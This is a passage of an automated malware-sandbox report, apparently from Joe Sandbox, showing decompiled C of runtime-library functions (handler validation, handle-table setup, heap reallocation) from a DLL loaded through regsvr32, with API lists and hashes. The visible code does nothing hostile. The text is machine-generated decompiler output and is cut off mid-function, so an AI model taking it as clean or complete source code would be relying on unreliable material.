                                                                                                            				short* _t77;
                                                                                                            				void* _t79;
                                                                                                            				signed int _t80;
                                                                                                            				signed int _t81;
                                                                                                            				signed int _t82;
                                                                                                            				signed int _t83;
                                                                                                            				intOrPtr _t88;
                                                                                                            				signed int _t91;
                                                                                                            				signed int _t92;
                                                                                                            				signed int _t93;
                                                                                                            
                                                                                                            				_t92 = _a4;
                                                                                                            				_t69 =  *(_t92 + 8);
                                                                                                            				if((_t69 & 0x00000003) != 0) {
                                                                                                            					L3:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_a4 =  *[fs:0x18];
                                                                                                            				_t51 = _a4;
                                                                                                            				_t73 =  *((intOrPtr*)(_t51 + 8));
                                                                                                            				_v8 = _t73;
                                                                                                            				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
                                                                                                            					_t88 =  *((intOrPtr*)(_t92 + 0xc));
                                                                                                            					__eflags = _t88 - 0xffffffff;
                                                                                                            					if(_t88 != 0xffffffff) {
                                                                                                            						_t81 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						_a4 = 0;
                                                                                                            						_t52 = _t69;
                                                                                                            						do {
                                                                                                            							_t74 =  *_t52;
                                                                                                            							__eflags = _t74 - 0xffffffff;
                                                                                                            							if(_t74 == 0xffffffff) {
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            							__eflags = _t74 - _t81;
                                                                                                            							if(_t74 >= _t81) {
                                                                                                            								L41:
                                                                                                            								_t56 = 0;
                                                                                                            								L57:
                                                                                                            								return _t56;
                                                                                                            							}
                                                                                                            							L9:
                                                                                                            							__eflags =  *(_t52 + 4);
                                                                                                            							if( *(_t52 + 4) != 0) {
                                                                                                            								_t13 =  &_a4;
                                                                                                            								 *_t13 = _a4 + 1;
                                                                                                            								__eflags =  *_t13;
                                                                                                            							}
                                                                                                            							_t81 = _t81 + 1;
                                                                                                            							_t52 = _t52 + 0xc;
                                                                                                            							__eflags = _t81 - _t88;
                                                                                                            						} while (_t81 <= _t88);
                                                                                                            						__eflags = _a4;
                                                                                                            						if(_a4 == 0) {
                                                                                                            							L15:
                                                                                                            							_t53 =  *0x1004f590; // 0x0
                                                                                                            							_t91 = _t69 & 0xfffff000;
                                                                                                            							_t93 = 0;
                                                                                                            							__eflags = _t53;
                                                                                                            							if(_t53 <= 0) {
                                                                                                            								L18:
                                                                                                            								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
                                                                                                            								__eflags = _t55;
                                                                                                            								if(_t55 == 0) {
                                                                                                            									L56:
                                                                                                            									_t56 = _t55 | 0xffffffff;
                                                                                                            									__eflags = _t56;
                                                                                                            									goto L57;
                                                                                                            								}
                                                                                                            								__eflags = _v36.Type - 0x1000000;
                                                                                                            								if(_v36.Type != 0x1000000) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								__eflags = _v36.Protect & 0x000000cc;
                                                                                                            								if((_v36.Protect & 0x000000cc) == 0) {
                                                                                                            									L28:
                                                                                                            									_t57 = InterlockedExchange(0x1004f5d8, 1);
                                                                                                            									__eflags = _t57;
                                                                                                            									if(_t57 != 0) {
                                                                                                            										goto L5;
                                                                                                            									}
                                                                                                            									_t75 =  *0x1004f590; // 0x0
                                                                                                            									__eflags = _t75;
                                                                                                            									_t82 = _t75;
                                                                                                            									if(_t75 <= 0) {
                                                                                                            										L33:
                                                                                                            										__eflags = _t82;
                                                                                                            										if(_t82 != 0) {
                                                                                                            											L40:
                                                                                                            											InterlockedExchange(0x1004f5d8, 0);
                                                                                                            											goto L5;
                                                                                                            										}
                                                                                                            										_t70 = 0xf;
                                                                                                            										__eflags = _t75 - _t70;
                                                                                                            										if(_t75 <= _t70) {
                                                                                                            											_t70 = _t75;
                                                                                                            										}
                                                                                                            										_t83 = 0;
                                                                                                            										__eflags = _t70;
                                                                                                            										if(_t70 < 0) {
                                                                                                            											L38:
                                                                                                            											__eflags = _t75 - 0x10;
                                                                                                            											if(_t75 < 0x10) {
                                                                                                            												_t76 = _t75 + 1;
                                                                                                            												__eflags = _t76;
                                                                                                            												 *0x1004f590 = _t76;
                                                                                                            											}
                                                                                                            											goto L40;
                                                                                                            										} else {
                                                                                                            											do {
                                                                                                            												_t60 = 0x1004f598 + _t83 * 4;
                                                                                                            												_t83 = _t83 + 1;
                                                                                                            												__eflags = _t83 - _t70;
                                                                                                            												 *_t60 = _t91;
                                                                                                            												_t91 =  *_t60;
                                                                                                            											} while (_t83 <= _t70);
                                                                                                            											goto L38;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t61 = 0x1004f594 + _t75 * 4;
                                                                                                            									while(1) {
                                                                                                            										__eflags =  *_t61 - _t91;
                                                                                                            										if( *_t61 == _t91) {
                                                                                                            											goto L33;
                                                                                                            										}
                                                                                                            										_t82 = _t82 - 1;
                                                                                                            										_t61 = _t61 - 4;
                                                                                                            										__eflags = _t82;
                                                                                                            										if(_t82 > 0) {
                                                                                                            											continue;
                                                                                                            										}
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									goto L33;
                                                                                                            								}
                                                                                                            								_t77 = _v36.AllocationBase;
                                                                                                            								__eflags =  *_t77 - 0x5a4d;
                                                                                                            								if( *_t77 != 0x5a4d) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
                                                                                                            								__eflags =  *_t55 - 0x4550;
                                                                                                            								if( *_t55 != 0x4550) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
                                                                                                            								if( *((short*)(_t55 + 0x18)) != 0x10b) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								_t71 = _t69 - _t77;
                                                                                                            								__eflags =  *((short*)(_t55 + 6));
                                                                                                            								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
                                                                                                            								if( *((short*)(_t55 + 6)) <= 0) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								_t63 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                            								__eflags = _t71 - _t63;
                                                                                                            								if(_t71 < _t63) {
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
                                                                                                            								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t79 + 0x27) & 0x00000080;
                                                                                                            								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
                                                                                                            									goto L41;
                                                                                                            								}
                                                                                                            								goto L28;
                                                                                                            							} else {
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L16:
                                                                                                            								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                                                            								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t93 = _t93 + 1;
                                                                                                            								__eflags = _t93 - _t53;
                                                                                                            								if(_t93 < _t53) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            							__eflags = _t93;
                                                                                                            							if(_t93 <= 0) {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            							_t64 = InterlockedExchange(0x1004f5d8, 1);
                                                                                                            							__eflags = _t64;
                                                                                                            							if(_t64 != 0) {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                                                            							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                                                            								L53:
                                                                                                            								_t80 = 0;
                                                                                                            								__eflags = _t93;
                                                                                                            								if(_t93 < 0) {
                                                                                                            									L55:
                                                                                                            									InterlockedExchange(0x1004f5d8, 0);
                                                                                                            									goto L5;
                                                                                                            								} else {
                                                                                                            									goto L54;
                                                                                                            								}
                                                                                                            								do {
                                                                                                            									L54:
                                                                                                            									_t66 = 0x1004f598 + _t80 * 4;
                                                                                                            									_t80 = _t80 + 1;
                                                                                                            									__eflags = _t80 - _t93;
                                                                                                            									 *_t66 = _t91;
                                                                                                            									_t91 =  *_t66;
                                                                                                            								} while (_t80 <= _t93);
                                                                                                            								goto L55;
                                                                                                            							}
                                                                                                            							_t67 =  *0x1004f590; // 0x0
                                                                                                            							_t43 = _t67 - 1; // -1
                                                                                                            							_t93 = _t43;
                                                                                                            							__eflags = _t93;
                                                                                                            							if(_t93 < 0) {
                                                                                                            								L49:
                                                                                                            								__eflags = _t67 - 0x10;
                                                                                                            								if(_t67 < 0x10) {
                                                                                                            									_t67 = _t67 + 1;
                                                                                                            									__eflags = _t67;
                                                                                                            									 *0x1004f590 = _t67;
                                                                                                            								}
                                                                                                            								_t46 = _t67 - 1; // 0x0
                                                                                                            								_t93 = _t46;
                                                                                                            								goto L53;
                                                                                                            							} else {
                                                                                                            								goto L46;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L46:
                                                                                                            								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                                                            								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t93 = _t93 - 1;
                                                                                                            								__eflags = _t93;
                                                                                                            								if(_t93 >= 0) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							__eflags = _t93;
                                                                                                            							if(__eflags >= 0) {
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L55;
                                                                                                            								}
                                                                                                            								goto L53;
                                                                                                            							}
                                                                                                            							goto L49;
                                                                                                            						}
                                                                                                            						_t68 =  *((intOrPtr*)(_t92 - 8));
                                                                                                            						__eflags = _t68 - _v8;
                                                                                                            						if(_t68 < _v8) {
                                                                                                            							goto L41;
                                                                                                            						}
                                                                                                            						__eflags = _t68 - _t92;
                                                                                                            						if(_t68 >= _t92) {
                                                                                                            							goto L41;
                                                                                                            						}
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					_t56 = 1;
                                                                                                            					goto L57;
                                                                                                            				} else {
                                                                                                            					goto L3;
                                                                                                            				}
                                                                                                            			}



































                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001472b
                                                                                                            0x1001472b
                                                                                                            0x1001472b
                                                                                                            0x10014732
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014738
                                                                                                            0x10014739
                                                                                                            0x1001473b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001473b
                                                                                                            0x10014836
                                                                                                            0x10014838
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001484b
                                                                                                            0x1001484d
                                                                                                            0x1001484f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014855
                                                                                                            0x1001485c
                                                                                                            0x1001488c
                                                                                                            0x1001488c
                                                                                                            0x1001488e
                                                                                                            0x10014890
                                                                                                            0x100148a4
                                                                                                            0x100148ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014892
                                                                                                            0x10014892
                                                                                                            0x10014892
                                                                                                            0x1001489b
                                                                                                            0x1001489c
                                                                                                            0x1001489e
                                                                                                            0x100148a0
                                                                                                            0x100148a0
                                                                                                            0x00000000
                                                                                                            0x10014892
                                                                                                            0x1001485e
                                                                                                            0x10014863
                                                                                                            0x10014863
                                                                                                            0x10014866
                                                                                                            0x10014868
                                                                                                            0x1001487a
                                                                                                            0x1001487a
                                                                                                            0x1001487d
                                                                                                            0x1001487f
                                                                                                            0x1001487f
                                                                                                            0x10014880
                                                                                                            0x10014880
                                                                                                            0x10014885
                                                                                                            0x10014885
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001486a
                                                                                                            0x1001486a
                                                                                                            0x1001486a
                                                                                                            0x10014871
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014873
                                                                                                            0x10014873
                                                                                                            0x10014874
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014874
                                                                                                            0x10014876
                                                                                                            0x10014878
                                                                                                            0x1001488a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001488a
                                                                                                            0x00000000
                                                                                                            0x10014878
                                                                                                            0x10014704
                                                                                                            0x10014707
                                                                                                            0x1001470a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014710
                                                                                                            0x10014712
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014712
                                                                                                            0x100146cf
                                                                                                            0x100146d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2947987494-0
                                                                                                            • Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                                                            • Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
                                                                                                            • Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                                                            • Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1001614C() {
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t51;
                                                                                                            				signed int _t55;
                                                                                                            				long _t59;
                                                                                                            				signed int _t61;
                                                                                                            				signed int _t62;
                                                                                                            				signed int _t64;
                                                                                                            				signed int _t65;
                                                                                                            				void* _t69;
                                                                                                            				signed int* _t78;
                                                                                                            				signed int _t81;
                                                                                                            				signed int _t82;
                                                                                                            				signed int _t84;
                                                                                                            				signed int _t85;
                                                                                                            				signed int _t86;
                                                                                                            				signed char _t89;
                                                                                                            				signed int _t96;
                                                                                                            				void* _t99;
                                                                                                            				int _t101;
                                                                                                            				void** _t103;
                                                                                                            				void** _t105;
                                                                                                            				signed int** _t106;
                                                                                                            				intOrPtr* _t109;
                                                                                                            				void* _t110;
                                                                                                            
                                                                                                            				_t51 = E100107B6(0x480);
                                                                                                            				if(_t51 != 0) {
                                                                                                            					 *0x1004f920 = _t51;
                                                                                                            					 *0x1004f90c = 0x20;
                                                                                                            					_t1 = _t51 + 0x480; // 0x480
                                                                                                            					_t84 = _t1;
                                                                                                            					while(1) {
                                                                                                            						__eflags = _t51 - _t84;
                                                                                                            						if(_t51 >= _t84) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						 *_t51 =  *_t51 | 0xffffffff;
                                                                                                            						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
                                                                                                            						 *((char*)(_t51 + 4)) = 0;
                                                                                                            						 *((char*)(_t51 + 5)) = 0xa;
                                                                                                            						_t85 =  *0x1004f920; // 0x0
                                                                                                            						_t51 = _t51 + 0x24;
                                                                                                            						_t84 = _t85 + 0x480;
                                                                                                            						__eflags = _t84;
                                                                                                            					}
                                                                                                            					GetStartupInfoA(_t110 + 0x14);
                                                                                                            					__eflags =  *((short*)(_t110 + 0x46));
                                                                                                            					if( *((short*)(_t110 + 0x46)) == 0) {
                                                                                                            						L26:
                                                                                                            						_t81 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						do {
                                                                                                            							_t86 =  *0x1004f920; // 0x0
                                                                                                            							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
                                                                                                            							__eflags =  *_t103 - 0xffffffff;
                                                                                                            							if( *_t103 != 0xffffffff) {
                                                                                                            								_t49 =  &(_t103[1]);
                                                                                                            								 *_t49 = _t103[1] | 0x00000080;
                                                                                                            								__eflags =  *_t49;
                                                                                                            								goto L42;
                                                                                                            							}
                                                                                                            							__eflags = _t81;
                                                                                                            							_t103[1] = 0x81;
                                                                                                            							if(_t81 != 0) {
                                                                                                            								asm("sbb eax, eax");
                                                                                                            								_t59 =  ~(_t81 - 1) + 0xfffffff5;
                                                                                                            								__eflags = _t59;
                                                                                                            							} else {
                                                                                                            								_t59 = 0xfffffff6;
                                                                                                            							}
                                                                                                            							_t99 = GetStdHandle(_t59);
                                                                                                            							__eflags = _t99 - 0xffffffff;
                                                                                                            							if(_t99 == 0xffffffff) {
                                                                                                            								L40:
                                                                                                            								_t103[1] = _t103[1] | 0x00000040;
                                                                                                            							} else {
                                                                                                            								_t61 = GetFileType(_t99);
                                                                                                            								__eflags = _t61;
                                                                                                            								if(_t61 == 0) {
                                                                                                            									goto L40;
                                                                                                            								}
                                                                                                            								_t62 = _t61 & 0x000000ff;
                                                                                                            								__eflags = _t62 - 2;
                                                                                                            								 *_t103 = _t99;
                                                                                                            								if(__eflags != 0) {
                                                                                                            									__eflags = _t62 - 3;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t42 =  &(_t103[1]);
                                                                                                            										 *_t42 = _t103[1] | 0x00000008;
                                                                                                            										__eflags =  *_t42;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t103[1] = _t103[1] | 0x00000040;
                                                                                                            								}
                                                                                                            								_push(0xfa0);
                                                                                                            								_push( &(_t103[3]));
                                                                                                            								_t64 = E10019599(__eflags);
                                                                                                            								__eflags = _t64;
                                                                                                            								if(_t64 == 0) {
                                                                                                            									L30:
                                                                                                            									_t55 = _t64 | 0xffffffff;
                                                                                                            									L44:
                                                                                                            									return _t55;
                                                                                                            								} else {
                                                                                                            									_t103[2] = _t103[2] + 1;
                                                                                                            									goto L42;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L42:
                                                                                                            							_t81 = _t81 + 1;
                                                                                                            							__eflags = _t81 - 3;
                                                                                                            						} while (_t81 < 3);
                                                                                                            						SetHandleCount( *0x1004f90c);
                                                                                                            						_t55 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						goto L44;
                                                                                                            					}
                                                                                                            					_t65 =  *(_t110 + 0x48);
                                                                                                            					__eflags = _t65;
                                                                                                            					if(_t65 == 0) {
                                                                                                            						goto L26;
                                                                                                            					}
                                                                                                            					_t101 =  *_t65;
                                                                                                            					_t109 = _t65 + 4;
                                                                                                            					 *(_t110 + 0x10) = _t101 + _t109;
                                                                                                            					__eflags = _t101 - 0x800;
                                                                                                            					if(_t101 >= 0x800) {
                                                                                                            						_t101 = 0x800;
                                                                                                            					}
                                                                                                            					__eflags =  *0x1004f90c - _t101; // 0x20
                                                                                                            					if(__eflags >= 0) {
                                                                                                            						L18:
                                                                                                            						_t82 = 0;
                                                                                                            						__eflags = _t101;
                                                                                                            						if(_t101 <= 0) {
                                                                                                            							goto L26;
                                                                                                            						} else {
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L19:
                                                                                                            							_t69 =  *( *(_t110 + 0x10));
                                                                                                            							__eflags = _t69 - 0xffffffff;
                                                                                                            							if(_t69 == 0xffffffff) {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							_t89 =  *_t109;
                                                                                                            							__eflags = _t89 & 0x00000001;
                                                                                                            							if((_t89 & 0x00000001) == 0) {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							__eflags = _t89 & 0x00000008;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								L23:
                                                                                                            								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
                                                                                                            								 *_t105 =  *( *(_t110 + 0x10));
                                                                                                            								_t105[1] =  *_t109;
                                                                                                            								_push(0xfa0);
                                                                                                            								_push( &(_t105[3]));
                                                                                                            								_t64 = E10019599(__eflags);
                                                                                                            								__eflags = _t64;
                                                                                                            								if(_t64 == 0) {
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t31 =  &(_t105[2]);
                                                                                                            								 *_t31 = _t105[2] + 1;
                                                                                                            								__eflags =  *_t31;
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							__eflags = GetFileType(_t69);
                                                                                                            							if(__eflags == 0) {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							goto L23;
                                                                                                            							L25:
                                                                                                            							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
                                                                                                            							_t82 = _t82 + 1;
                                                                                                            							_t109 = _t109 + 1;
                                                                                                            							__eflags = _t82 - _t101;
                                                                                                            						} while (_t82 < _t101);
                                                                                                            						goto L26;
                                                                                                            					} else {
                                                                                                            						_t106 = 0x1004f924;
                                                                                                            						while(1) {
                                                                                                            							_t78 = E100107B6(0x480);
                                                                                                            							__eflags = _t78;
                                                                                                            							if(_t78 == 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							 *0x1004f90c =  *0x1004f90c + 0x20;
                                                                                                            							 *_t106 = _t78;
                                                                                                            							_t12 =  &(_t78[0x120]); // 0x480
                                                                                                            							_t96 = _t12;
                                                                                                            							while(1) {
                                                                                                            								__eflags = _t78 - _t96;
                                                                                                            								if(_t78 >= _t96) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								 *_t78 =  *_t78 | 0xffffffff;
                                                                                                            								_t78[2] = _t78[2] & 0x00000000;
                                                                                                            								_t78[1] = 0;
                                                                                                            								_t78[1] = 0xa;
                                                                                                            								_t78 =  &(_t78[9]);
                                                                                                            								_t96 =  &(( *_t106)[0x120]);
                                                                                                            								__eflags = _t96;
                                                                                                            							}
                                                                                                            							_t106 =  &(_t106[1]);
                                                                                                            							__eflags =  *0x1004f90c - _t101; // 0x20
                                                                                                            							if(__eflags < 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t101 =  *0x1004f90c; // 0x20
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t51 | 0xffffffff;
                                                                                                            			}



























                                                                                                            0x1001629f
                                                                                                            0x100162a0
                                                                                                            0x100162a0
                                                                                                            0x00000000
                                                                                                            0x100161e6
                                                                                                            0x100161e6
                                                                                                            0x100161eb
                                                                                                            0x100161ec
                                                                                                            0x100161f1
                                                                                                            0x100161f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100161f6
                                                                                                            0x100161fd
                                                                                                            0x100161ff
                                                                                                            0x100161ff
                                                                                                            0x1001621d
                                                                                                            0x1001621d
                                                                                                            0x1001621f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016207
                                                                                                            0x1001620a
                                                                                                            0x1001620e
                                                                                                            0x10016212
                                                                                                            0x10016218
                                                                                                            0x1001621b
                                                                                                            0x1001621b
                                                                                                            0x1001621b
                                                                                                            0x10016221
                                                                                                            0x10016224
                                                                                                            0x1001622a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001622c
                                                                                                            0x1001622e
                                                                                                            0x00000000
                                                                                                            0x1001622e
                                                                                                            0x100161e4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 100161A9
                                                                                                            • GetFileType.KERNEL32(?), ref: 10016253
                                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 100162D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleInfoStartupType
                                                                                                            • String ID:
                                                                                                            • API String ID: 2461013171-0
                                                                                                            • Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                                                            • Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
                                                                                                            • Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                                                            • Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				long _t30;
                                                                                                            				long _t31;
                                                                                                            				long _t33;
                                                                                                            				void* _t36;
                                                                                                            				long _t38;
                                                                                                            				long _t41;
                                                                                                            				long _t42;
                                                                                                            				long _t44;
                                                                                                            				long _t46;
                                                                                                            				void* _t59;
                                                                                                            				long _t61;
                                                                                                            				void* _t67;
                                                                                                            				void* _t68;
                                                                                                            
                                                                                                            				_push(0x14);
                                                                                                            				_push(0x10041dc0);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t59 =  *(_t67 + 8);
                                                                                                            				if(_t59 != 0) {
                                                                                                            					_t61 =  *(_t67 + 0xc);
                                                                                                            					__eflags = _t61;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						__eflags =  *0x10050a64 - 3;
                                                                                                            						if( *0x10050a64 != 3) {
                                                                                                            							while(1) {
                                                                                                            								_t28 = 0;
                                                                                                            								__eflags = _t61 - 0xffffffe0;
                                                                                                            								if(_t61 <= 0xffffffe0) {
                                                                                                            									__eflags = _t61;
                                                                                                            									if(_t61 == 0) {
                                                                                                            										_t61 = 1;
                                                                                                            										__eflags = 1;
                                                                                                            									}
                                                                                                            									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
                                                                                                            								}
                                                                                                            								__eflags = _t28;
                                                                                                            								if(_t28 != 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								__eflags =  *0x1004f58c; // 0x0
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								_t30 = E10014676(_t61);
                                                                                                            								__eflags = _t30;
                                                                                                            								if(_t30 != 0) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L36;
                                                                                                            							}
                                                                                                            							goto L37;
                                                                                                            						} else {
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L5:
                                                                                                            							 *(_t67 - 0x1c) = 0;
                                                                                                            							__eflags = _t61 - 0xffffffe0;
                                                                                                            							if(_t61 > 0xffffffe0) {
                                                                                                            								L25:
                                                                                                            								_t28 =  *(_t67 - 0x1c);
                                                                                                            								__eflags =  *(_t67 - 0x1c);
                                                                                                            								if( *(_t67 - 0x1c) != 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								__eflags =  *0x1004f58c; // 0x0
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								goto L27;
                                                                                                            							}
                                                                                                            							E10013A38(0, _t59, 4);
                                                                                                            							 *(_t67 - 4) = 0;
                                                                                                            							_t33 = E10013B9B(_t59);
                                                                                                            							 *(_t67 - 0x20) = _t33;
                                                                                                            							__eflags = _t33;
                                                                                                            							if(_t33 == 0) {
                                                                                                            								L21:
                                                                                                            								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                                                                                                            								E100124B7();
                                                                                                            								__eflags =  *(_t67 - 0x20);
